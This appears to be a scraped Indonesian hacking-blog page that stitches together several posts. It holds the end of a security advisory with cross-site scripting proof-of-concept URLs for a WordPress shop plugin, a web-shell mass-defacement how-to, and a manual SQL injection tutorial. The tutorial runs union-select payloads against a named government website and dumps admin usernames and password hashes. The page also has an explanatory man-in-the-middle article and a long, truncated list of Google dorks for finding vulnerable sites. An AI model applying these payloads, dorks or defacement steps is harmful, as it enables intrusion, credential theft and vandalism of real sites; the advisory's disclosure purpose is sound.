4.1 Input passed via the "search_by" GET parameter to "/wp-admin/admin.php?page=thecartpress/admin/AddressesList.php" is not properly sanitised before being returned to the user. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.

http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressesList.php&search_by=--%3E%%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E

4.2 Input passed via the "address_id", "address_name", "firstname", "lastname", "street", "city", "postcode", "email" GET parameters to "/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php" is not properly sanitised before being returned to the user. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.

http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&address_id=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&address_name=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&firstname=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&lastname=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&street=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&city=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&postcode=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&email=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E

4.3 Input passed via the "post_id" and "rel_type" GET parameters to "/wp-admin/admin.php?page=thecartpress/admin/AssignedCategoriesList.php" is not properly sanitised before being returned to the user. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.

http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AssignedCategoriesList.php&post_id=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AssignedCategoriesList.php&post_id=1&rel_type=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E

4.4 Input passed via the "post_type" GET parameter to "/wp-admin/admin.php?page=thecartpress/admin/CustomFieldsList.php" is not properly sanitised before being returned to the user. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.

http://wordpress/wp-admin/admin.php?page=thecartpress/admin/CustomFieldsList.php&post_type=1--%3E%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E

-----------------------------------------------------------------------------------------------

Solution:

2015-04-08 Vendor Alerted via emails.
2015-04-17 Vendor Alerted via contact form and emails.
2015-04-17 Vendor Alerted via WordPress Support Forums.
2015-04-27 Fix Requested via emails.
2015-04-29 Public disclosure.

Currently we are not aware of any official solution for this vulnerability.
According to the vendor the plugin will not be supported anymore since 1st of June 2015: http://thecartpress.com/extend/important-note-nota-importante/

We recommend disabling or removing the vulnerable plugin as a workaround.

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23254 - https://www.htbridge.com/advisory/HTB23254 - Multiple vulnerabilities in TheCartPress Wordpress plugin.
[2] TheCartPress Wordpress plugin- http://thecartpress.com/ - Professional WordPress eCommerce Plugin. Use it as Shopping Cart, Catalog or Framework.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Diposting oleh Tidak ada komentar:

Mass Deface

Bahan :
  • Mass Deface ( udah ada di shell X Inject / IDCA / etc )
  • Website yang direktorinya ada domain/web lain.
masuk ke direktori yg ada sitenya
Click mass deface yg ada di shell (semiga banyak site disana :v)
masukan code script ke index code
click Deface/Hajar
dan udah itu aja enjoy

:) Makasih

nb:segala dosa di tanggung pelaku ts menulis sekedar untuk pembelajaran

Thanks to :IDCA
Diposting oleh Tidak ada komentar:

Tutorial SQLi Manual

BY :Tener_Attacker

SQL Injection merupakan sebuah teknik hacking dimana seorang penyerang dapat memasukkan perintah-perintah SQL melalui url untuk dieksekusi oleh database. Penyebab utama dari celah ini adalah variable yang kurang di filter :

id=$id;……. > Got Error

Hal pertama yang harus kita lakukan adalah mengetahui apakah situs tersebut terkena celah SQL Injection atau tidak, yaitu dengan membuat sebuah error dengan menambahkan karakter ‘ setelah atau sesudah angka pada url.

Contoh : http://situstarget.com/news.php?id=1’ http://situstarget.com/news.php?id=’1

Pertama kita cari dulu website yang memiliki celah SQL Injection. silahkan sobat cari target di google dengan menggunakan dork.

Dork SQLi :


inurl:azerty.php?id= , inurl:bouquin.php?id= , inurl:lien.php?id= , inurl:clavier.php?id= inurl:index.php?id=inurl:trainers.php?id=inurl:buy.php?category=inurl:article.php?ID=inurl:play_old.php?id=inurl:games.php?id=inurl:iniziativa.php?in=inurl:curriculum.php?id=inurl:labels.php?id=inurl:story.php?id=inurl:look.php?ID=inurl:newsone.php?id=inurl:aboutbook.php?id=inurl:material.php?id=inurl:opinions.php?id=inurl:announce.php?id=
Disini saya sudah menemukan targetnya : http://diklat.lampungprov.go.id/more.php?id=1




Kemudian kita akan mencari dan menghitung jumlah tabel yang ada pada database web tersebut. silahkan sobat gunakan perintah : order by 1 - dan seterusnya sampai terjadi error pada halaman. gunaka tanda + sebagai spasi, dan pada akhir perintah gunakan tanda --.

http://diklat.lampungprov.go.id/more.php?id=1+order+by+1-- < No Errorhttp://diklat.lampungprov.go.id/more.php?id=1+order+by+2-- < No Errorhttp://diklat.lampungprov.go.id/more.php?id=1+order+by+3-- < No Errorhttp://diklat.lampungprov.go.id/more.php?id=1+order+by+4-- < No Errorhttp://diklat.lampungprov.go.id/more.php?id=1+order+by+5-- < No Error [Terlalu banyak diSkip aja]http://diklat.lampungprov.go.id/more.php?id=1+order+by+17-- < No Error


  http://diklat.lampungprov.go.id/more.php?id=1+order+by+18-- < Error




Pada angka 18 ternyata muncul error, jadi yang kita ambil angka sebelum munculnya pesan error. itu berarti jumlah tabel pada databasenya ada 17.


Selanjutnya kita akan mencari angka tabel yang bisa kita gunakan untuk perintah2 injection pada tahap selanjutnya. Gunakan perintah union select diikuti jumlah tabel dan tanda - sebelum angka dan diakhiri dengan tanda --. contoh:

http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--




nanti muncul sebuah angka tebal, nah Diangka tersebut nantinya yang akan kita masukkan perintah2 selanjutnya.


Pada tahap Selanjutnya kita akan mengetahui versi database yang dipakai oleh web tersebut. gunakan perintah "version()" atau "@@version".contoh: http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,@@version,17--




Nah pada gambar kita bisa lihat versi database yang dipake adalah v.5.5.14, jadi pada versi 5 itu berberda dengan versi 4. prosesnya lebih repot pada versi 4, karena untuk melakukan perintah2 SQLi pada versi 4 kita harus menebak 1 per 1 tabel yang ada pada databasenya.

Sekarang perintah selanjutnya kita akan memunculkan nama-nama tabel yang ada pada web tersebut. gunakan perintah “group_concat(table_name)” dan menambahkan perintah “from+information_schema.tables+where+table_schema=database()" sesudah angka terakhir, dan diakhiri dengan tanda --.contoh :http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(table_name),17+from+information_schema.tables+where+table_schema=database()--



Disitu kita dapatkan nama-nama tabelnya sperti : tbadmin, tbbukutamu, tbcontent, tbcounter, tbdivisi, tbgolongan, tbjadwal, dll. Langkah selanjutnya kita akan mencari username dan password admin pada tabel tbadmin. Perlu diketahui bahwa tidak semua nama tabel pada setiap web itu sama, jadi untuk mencari tabel admin, silahkan sobat kira-kira saja dimana tabel yang sobat curigai tempat username dan password admin berada. Kemudian untuk mengeluarkan isi yang ada pada kolom tbadmin gunakan perintah berikut: “group_concat(columns_name) ” dan perintah “from+information_schema.columns+where+table_name=CHAR()" sesudah angka terakhir, dan diakhiri dengan tanda --. Pada tahap ini nama tabel tbadmin harus dikonversi dulu ke bentuk decimal :) silahkan sobat gunakan toolsnya DISINI. kemudian hasil konversi tbadmin adalah 116 98 97 100 109 105 110 lalu kita masukkan ke CHAR(116, 98, 97, 100, 109, 105, 110) dan pisahkan dengan koma. jadi perintahnya seperti berikut:

http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(column_name),17+from+information_schema.columns+where+table_name=CHAR(116, 98, 97, 100, 109, 105, 110)--



Nah disitu muncul kolom username, pswd, status. lalu langkah selanjutnya kita akan melihat isi dari kolom kolom yang muncul tadi dengan menambah perintah group_concat(username,0x3a,pswd,0x3a,status) . jangan lupa di setiap sela2 tambahkan kode 0x3a yg merupakan hasil konversi hexa dari tanda titik dua ( : ). lalu tambahkan perintah  +from+tbadmin--, tbadmin merupakan tabel yang kita dapatkan tadi.

http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(username,0x3a,pswd,0x3a,status),17+from+tbadmin--

By : Tener_Attacker


Nah kan udah keliatan username dan passwordnya.. :) dari gambar muncul data :user1:8dfad4f7356a2e403c900b2944990ddc:1,user:8dfad4f7356a2e403c900b2944990ddc:0 selanjutnya sobat tinggal mengcrack password yang berbentuk md5 hash tersebut
Diposting oleh Tidak ada komentar:

mengenal serangan MITM (Men In The Middle)

Sudah banyak artikel di ilmuhacking yang membahas teknik serangan man in the middle (mitm), namun belum pernah saya menjelaskan secara detil tentang apa itu mitm attack. Mitm attack merupakan jenis serangan yang sangat berbahaya dan bisa terjadi di mana saja, baik di website, telepon seluler, maupun di peralatan komunikasi tradisional seperti surat menyurat. Oleh karena itu saya pikir perlu ada satu artikel khusus yang membahas tentang mitm attack terlepas dari apapun dan dimanapun implementasi teknisnya.

Bukan Sekedar Sniffing
Mungkin banyak yang mengira tujuan dari serangan mitm adalah untuk menyadap komunikasi data rahasia, seperti yang sniffing. Sniffing bisa disebut sebagai passive attack karena pada sniffing attacker tidak melakukan tindakan  apa-apa selain memantau data yang lewat.  Memang benar dengan serangan mitm, seorang attacker bisa mengetahui apa yang dibicarakan oleh dua pihak yang berkomunikasi. Namun sebenarnya kekuatan terbesar dari mitm bukan pada kemampuan sniffingnya, namun pada kemampuan mencegat dan mengubah komunikasi sehingga mitm attack bisa disebut sebagai jenis serangan aktif.
Gambar di bawah ini adalah skenario yang bisa dilakukan attacker dengan serangan mitm.

sniffing,intercepting,tampering,fabricating
Pada gambar tersebut terlihat ada 4 macam serangan yang bisa dilakukan dengan MITM. Berikut adalah penjelasan dari jenis serangan tersebut dalam skenario seperti gambar di atas.

  • Sniffing: Charlie mengetahui semua pembicaraan antara Alice dan Bob.
  • Intercepting: Charlie mencegat pesan dari Alice ketika Alice ingin menutup percakapan dengan “Bob I’m going to sleep, Bye!”. Dengan begini Bob mengira Alice masih berkomunikasi dengannya.
  • Tampering: Charlie mengubah jawaban Bob kepada Alice dari account Paypal bob menjadi charlie.
  • Fabricating: Charlie menanyakan nomor social security number kepada Bob, padahal pertanyaan ini tidak pernah diajukan oleh Alice.
Dengan cara mitm ini bisa dibayangkan betapa besar potensi kerusakan yang bisa dilakukan Charlie kepada Alice dan Bob.

Proses Terjadinya Serangan Man-in-The-Middle
Dalam serangan mitm, seorang attacker akan berada di tengah-tengah komunikasi antara dua pihak. Seluruh pembicaraan yang terjadi di antara mereka harus melalui attacker dulu di tengah. Attacker dengan leluasa melakukan penyadapan, pencegatan, pengubahan bahkan memalsukan komunikasi seperti yang sudah saya jelaskan sebelumnya.
Sekarang mari kita lihat proses terjadinya MITM dalam contoh kasus Alice berkomunikasi dengan Bob. Charlie sebagai attacker akan berusaha berada di tengah antara Alice dan Bob. Agar Charlie berhasil menjadi orang ditengah, maka Charlie harus:

  • menyamar sebagai Bob dihadapan Alice
  • menyamar sebagai Alice dihadapan Bob
Charlie acts as fake Bob and fake Alice
Dalam mitm, Alice mengira sedang berbicara dengan Bob, padahal dia sedang berbicara dengan Charlie. Begitu juga Bob, dia mengira sedang berbicara dengan Alice, padahal sebenarnya dia sedang berbicara dengan Alice. Jadi agar bisa menjadi orang di tengah Charlie harus bisa menyamar di dua sisi, tidak bisa hanya di satu sisi saja.
Kenapa Alice dan Bob bisa terjebak dan tertipu oleh Charlie? Itu karena Alice dan Bob tidak melakukan otentikasi dulu sebelum berkomunikasi. Otentikasi akan menjamin Alice berbicara dengan Bob yang asli, bukan Bob palsu yang diperankan oleh Charlie. Begitu juga dengan otentikasi, Bob akan berbicara dengan Alice yang asli, bukan Alice palsu yang diperankan oleh Charlie.

Pentingnya Otentikasi: Who Are You Speaking With?

Otentikasi adalah proses untuk membuktikan identitas suatu subjek, bisa orang atau mesin. Proses membuktikan identitas seeorang ada banyak cara, namun semuanya bisa dikelompokkan dalam 3 kategori:

  • What you know: PIN, password, pasangan kunci publik-privat
  • What you have: smart card, kunci, USB dongle
  • What you are: fingerprint, retina
Secara singkat otentikasi menjawab pertanyaan “Who are you speaking with?”. Pertanyaan itu sangat penting diketahui sebelum dua pihak berkomunikasi. Bila dua pihak berkomunikasi tanpa sebelumnya melakukan otentikasi, maka keduanya bisa terjebak berbicara dengan orang yang salah, yaitu orang yang menyamar menjadi lawan bicaranya. Bila sampai ini terjadi maka akibatnya bisa sangat fatal, salah satunya adalah terjadinya mitm attack.
Bila dua orang yang sudah saling mengenal berbicara dengan tatap muka langsung, maka tidak mungkin keduanya terjebak dan tertipu berbicara dengan orang yang salah. Otentikasi menjadi sangat penting bila kedua pihak berbicara melalui media komunikasi jarak jauh seperti telpon atau internet. Dalam komunikasi jarak jauh, kita hanya bisa mendengar suara lawan bicara kita, jadi sangat besar kemungkinan kita berbicara dengan orang yang salah.
Jadi cara untuk mencegah serangan MITM adalah dengan melakukan otentikasi sebelum berkomunikasi. Bahkan walaupun otentikasi dilakukan oleh salah satu pihak saja, itu sudah cukup untuk mencegah mitm. Mari kita lihat kembali contoh Alice,  Bob dan Charlie, bila otentikasi hanya dilakukan oleh Bob, sedangkan Alice tidak. Karena tidak adanya otentikasi Alice, maka Charlie bisa menyamar sebagai Alice di hadapan Bob, namun Charlie tidak bisa menyamar sebagai Bob di hadapan Alice. Kenapa Charlie tidak bisa menyamar menjadi Bob? Sebab Alice akan menguji keaslian Bob dengan otentikasi, sehingga penyamaran Charlie sebagai Bob palsu akan terbongkar dan Alice tidak akan mau melanjutkan komunikasi

Thank ^_^








Diposting oleh Tidak ada komentar:

Cara Buat document di Via Hp

Misalnya:
https://m2.facebook.com/editdoc.php?group_id=1559206537688320&hc_location=ufi&_rdr

Anda tinggal copy paste saja linknya dan tinggal anda ubah ID groupnya sesuai dengan ID group Tersebut
Diposting oleh Tidak ada komentar:

Dork SQL Injection / Havij Lengkap

inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php?ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl:offer.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.php?decl_id= inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray-Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl:news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl:select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem.php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view.php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php?id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl:downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl:product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail.php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl:readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl :/PhotoCart/ inurl: Powered by Traidnt UP Version 1.0. inurl: modifyform.html?code= inurl:*.exe ext:exe inurl:/*cgi*/ inurl:.asp? Powered by Comersus ASP Shopping Cart inurl:/SiteChassisManager/ inurl:/_blogadata/ inurl:/cgi-bin/index.cgi inurl:topics inurl:viewca inurl:/com_chronocontact inurl:/component/jeeventcalendar/ inurl:/component/jesectionfinder/ inurl:/components/je-media-player.html? inurl:/downlot.php?file= inurl:/hbcms/php/ inurl:/index.php?option=com_otzivi inurl:/index.php?option=com_yellowpages inurl:/infusions/e_cart inurl:/jobsearchengine/ inurl:/macgurublog_menu/ inurl:/modules/Partenaires/clic.php?id= inurl:/modules/camportail/ inurl:/modules/debaser/ inurl:/modules/kshop/ inurl:/modules/lykos_reviews/ inurl:/modules/rmgallery/ inurl:/modules/tinyevent/ inurl:/modules/wflinks inurl:/modules/xfsection/ inurl:/phpfootball/ inurl:/phpplanner/userinfo.php?userid= inurl:/squirrelcart/ inurl:/system/article/alltopics.php OR inurl:/system/user/index.php inurl:/tiny_mce/plugins/filemanager/ inurl:/webCal3_detail.asp?event_id= inurl:/webquest/soporte_derecha_w.php? inurl:/wp-content/plugins/fgallery/ inurl:/wp-content/plugins/wpSS/ inurl:CuteSoft_Client/CuteEditor inurl:Editor/assetmanager/assetmanager.asp inurl:JBSPro inurl:acrotxt.php wbb inurl:add_soft.php inurl:apages.php inurl:bemarket inurl:browsecats.php?cid= inurl:btg_oglas inurl:buyer/about_us.php?BuyerID inurl:cal_cat.php?op= inurl:cal_make.pl inurl:cart.php?m=features&id= inurl:categoria.php?ID= comune inurl:category.php?cate_id= inurl:cfaq/index.php?catid= inurl:choosecard.php?catid= inurl:citrix/metaframexp/default/login.asp? ClientDetection=On inurl:classified.php phpbazar inurl:classified/product_desc.php?id= inurl:classifieds/view.php?category= inurl:com_DTRegister eventId inurl:com_amresurrected inurl:com_annonces inurl:com_awd_song inurl:com_beamospetition inurl:com_bfsurvey_profree inurl:com_brightweblinks inurl:com_clanlist inurl:com_colophon inurl:com_community inurl:com_content inurl:com_cpg inurl:com_djclassifieds inurl:com_doqment inurl:com_eQuotes inurl:com_eportfolio inurl:com_expshop inurl:com_ezautos inurl:com_ezstore inurl:com_filiale inurl:com_flippingbook inurl:com_forum inurl:com_gamesbox inurl:com_gigcal inurl:com_idoblog inurl:com_img inurl:com_iproperty inurl:com_jabode inurl:com_jb2 inurl:com_jcommunity inurl:com_jeauto inurl:com_jejob inurl:com_jepoll inurl:com_jmarket inurl:com_jnewsletter inurl:com_jomestate inurl:com_jomtube inurl:com_joomladate inurl:com_joomradio inurl:com_jotloader inurl:com_jp_jobs inurl:com_jstore inurl:com_jtickets inurl:com_liveticker inurl:com_manager inurl:com_markt inurl:com_mdigg inurl:com_n-forms inurl:com_neorecruit inurl:com_netinvoice inurl:com_pinboard inurl:com_redshop inurl:com_remository inurl:com_seminar inurl:com_seyret inurl:com_simpleshop inurl:com_webring inurl:com_xewebtv inurl:com_ybggal inurl:comersus_message.asp inurl:comment.asp intext:Your e-mail address will be used to send you voting and comment activity. Inclusion of your address is optional but Battle Blog cannot notify you of these activities unless you supply an accurate e-mail. inurl:couponsite/index.php?page= inurl:course/category.php | inurl:course/info.php | inurl:iplookup/ipatlas/plot.php inurl:csc_article_details.php inurl:custva.asp inurl:directorypro.cgi inurl:dpage.php?docID inurl:e107_plugins inurl:eStore/index.cgi? inurl:employer_profile.php?compid= inurl:enq/big.asp?id= inurl:es_offer.php?files_dir= inurl:etkinlikbak.asp inurl:flashblog.html OR inurl:/flashblog/ inurl:forum_answer.php?que_id inurl:friend.php?op=FriendSend inurl:func=selectcat + com_remository inurl:gotoURL.asp?url= inurl:gotourl.php?id= inurl:hikaye.asp?id= inurl:imageview5 inurl:inc_accountlistmanager.asp inurl:inc_billboardmanager.asp?ItemID= inurl:inc_catalogmanager.asp inurl:inc_classifiedlistingsmanager.asp inurl:inc_contactusmanager.asp inurl:inc_documentlibrarymanager.asp inurl:inc_faqsmanager.asp inurl:inc_joblistingmanager.asp inurl:inc_linksmanager.asp inurl:inc_memberdirectorymanager.asp inurl:inc_membersareamanager.asp inurl:inc_newsmanager.asp inurl:inc_paypalstoremanager.asp inurl:inc_photogallerymanager.asp inurl:inc_registrationmanager.asp inurl:inc_securedocumentlibrary.asp inurl:inc_webblogmanager.asp inurl:index.php fees shop link.codes merchantAccount inurl:index.php/option?com_flexicontent inurl:index.php?ini[langpack]= inurl:index.php?menu=adorder inurl:index.php?menu=showcat inurl:index.php?menu=showcat= inurl:index.php?mod=ConcoursPhoto inurl:index.php?mod=jeuxflash inurl:index.php?mod=sondages inurl:index.php?mode=game_player inurl:index.php?myPlantId= inurl:index.php?option=com_NeoRecruit inurl:index.php?option=com_akobook inurl:index.php?option=com_allhotels inurl:index.php?option=com_calendario inurl:index.php?option=com_directory inurl:index.php?option=com_doqment&cid= inurl:index.php?option=com_ice inurl:index.php?option=com_jombib inurl:index.php?option=com_joomlaconnect_be inurl:index.php?option=com_joomradio inurl:index.php?option=com_lowcosthotels inurl:index.php?option=com_mambads inurl:index.php?option=com_mediaslide inurl:index.php?option=com_nicetalk inurl:index.php?option=com_noticia inurl:index.php?option=com_paxgallery inurl:index.php?option=com_portfolio inurl:index.php?option=com_yanc inurl:index.php?option=com_ynews inurl:index.php?ortupg= inurl:index.php?page=en_jobseekers inurl:index.php?page=img Powered By Mini File Host inurl:index.php?title=gamepage inurl:indexmess.php inurl:install.pl intitle:GTchat inurl:jgs_treffen.php inurl:makaledetay.asp?id= inurl:module=My_eGallery pid inurl:modules.php?name=Shopping_Cart inurl:modules/flashgames/ inurl:naviid + inurl:liste9 inurl:news.php?mode=voir inurl:option=articles artid inurl:option=com_agenda inurl:option=com_cinema inurl:option=com_education_classes inurl:option=com_huruhelpdesk inurl:option=com_mv_restaurantmenumanager inurl:option=com_mydyngallery inurl:option=com_n-forms form_id inurl:page.php?intPageID= inurl:panorama-viewer.php?id= inurl:perldiver.cgi ext:cgi inurl:php-stats.js.php inurl:post.php?Category=Garage inurl:profile.php?mode= inurl:prog.php?dwkodu= inurl:questions.php?idcat inurl:quizinfo.php inurl:ratelink.php?lnkid= inurl:resetcore.php ext:php inurl:roschedule.php inurl:showcat.asp?id= inurl:sysinfo.cgi ext:cgi inurl:tabid/176/Default.aspx OR inurl:portals/0/ inurl:technote inurl:main.cgi*filename=* inurl:test.php Powered by TalkBack inurl:tmssql.php ext:php mssql pear adodb -cvs -akbk inurl:tr.php?id= inurl:tr.php?id= Autoresponder inurl:tr.php?id= Banner inurl:tr.php?id= Downline inurl:tr.php?id= Hosting inurl:tr.php?id= Reminder Service inurl:treplies.asp?message= intitle:ASP Talk inurl:trr.php?id= inurl:ttt-webmaster.php inurl:ugroups.php?UID= inurl:view_group.php?id= inurl:w3.php?nodeId= inurl:wapmain.php?option= inurl:we_objectID= inurl:wiki/MediaWiki inurl:wp-login.php Register Username Password -echo inurl:yvcomment inurl:material.php?id= inurl:clanek.php4?id= inurl:announce.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:review.php?id= ======================================================================================================================================================================================================= "allinurl :""/modules/tutorials/""" "allinurl :""modules/eblog""" "allinurl :""modules/gallery""" "allinurl :""modules/recipe""" "allinurl :""wp-content/plugins/st_newsletter""" "allinurl: ""/modules/myTopics/""" "allinurl: ""com_actualite""" "allinurl: ""com_alberghi"" detail" "allinurl: ""com_estateagent""" "allinurl: ""com_galeria""" "allinurl: ""com_glossary""" "allinurl: ""com_joovideo"" detail" "allinurl: ""com_rapidrecipe""user_id" "allinurl: ""index php p shop""categ" "allinurl: ""index.php?area""galid" "allinurl: ""index.php?mod=galerie""action=gal" "allinurl: ""index.php?option=com_doc""" "allinurl: ""index.php?p=gallerypic img_id""" "allinurl: ""index.php?p=poll""showresult" "allinurl: ""index.php?showlink""links" "allinurl: ""modules MyAnnonces index php pa view""" "allinurl: ""modules/dictionary""" "allinurl: ""modules/dictionary/detail.php?id"" " "allinurl: ""modules/eEmpregos/index.php""" "allinurl: ""modules/glossaires""" "allinurl: ""modules/wfdownloads/viewcat.php?cid""" "allinurl: ""name Sections op viewarticle artid""" "allinurl: ""pollBooth.php?op=results""pollID" "allinurl: ""showCat.php?cat_id""" "allinurl: ""wordspew-rss.php""" "allinurl: aid ""com_xfaq""" "allinurl: cid""modules/classifieds/index.php?pa=Adsview""" "allinurl: com_gallery ""func""" "allinurl: com_mcquiz ""tid""" "allinurl: com_paxxgallery ""userid"" " "allinurl: com_pcchess ""user_id""" "allinurl: com_quiz""tid""" "allinurl: galid ""index.php?p=gallerypic""" "allinurl: id ""com_jooget""" "allinurl: modules-php-op-modload ""req view_cat""" "allinurl: page_id album ""photo""" "allinurl:""/lildbi/"" " "allinurl:""/questcms/""" "allinurl:""/ubbthreads/""" "allinurl:""article.download.php""" "allinurl:""channel_detail.php?chid=""" "allinurl:""com_accombo""" "allinurl:""com_ahsshop""do=default" "allinurl:""com_candle""" "allinurl:""com_cinema""" "allinurl:""com_extcalendar""" "allinurl:""com_garyscookbook""" "allinurl:""com_n-gallery""" "allinurl:""com_na_content""" "allinurl:""com_neogallery""" "allinurl:""com_restaurante""" "allinurl:""com_simpleshop""" "allinurl:""detResolucion.php?tipodoc_id=""" "allinurl:""index.php?mod=archives""" "allinurl:""index.php?site="" ""W-Agora""" "allinurl:""jokes.php?catagorie=""" "allinurl:""lyrics_menu/lyrics_song.php?l_id=""" "allinurl:""macgurublog.php?uid=""" "allinurl:""members.asp?action""" "allinurl:""modules/photo/viewcat.php?id""" "allinurl:""shop.htm?shopMGID=""" "allinurl:""verliadmin""" "allinurl:""xGb.php""" "inurl""com_gurujibook"" " "inurl: ""com_alphacontent""" "inurl: ""tops_top.php? id_cat =""" "inurl: user_info.php?user_id= "" Or "" inurl: index.php?catid= """ "inurl:""/CMS/page.php?p=""" "inurl:""/alternate_profiles/""" "inurl:""/becommunity/community/index.php?pageurl=""" "inurl:""/cgi-bin/loadpage.cgi?user_id=""" "inurl:""/cgi-bin/ourspace/""" "inurl:""/files/redirect.asp""" "inurl:""/gadmin/index.php""" "inurl:""/geeklog/""" "inurl:""/go/_files/?file=""" "inurl:""/index.php?m="" ""PHPRecipeBook 2.39""" "inurl:""/index.php?option=com_rsfiles""" "inurl:""/k12.tr/?part=""" "inurl:""/login.asp?folder="" ""Powered by: i-Gallery 3.3""" "inurl:""/modules.php?name="" ""Maximus 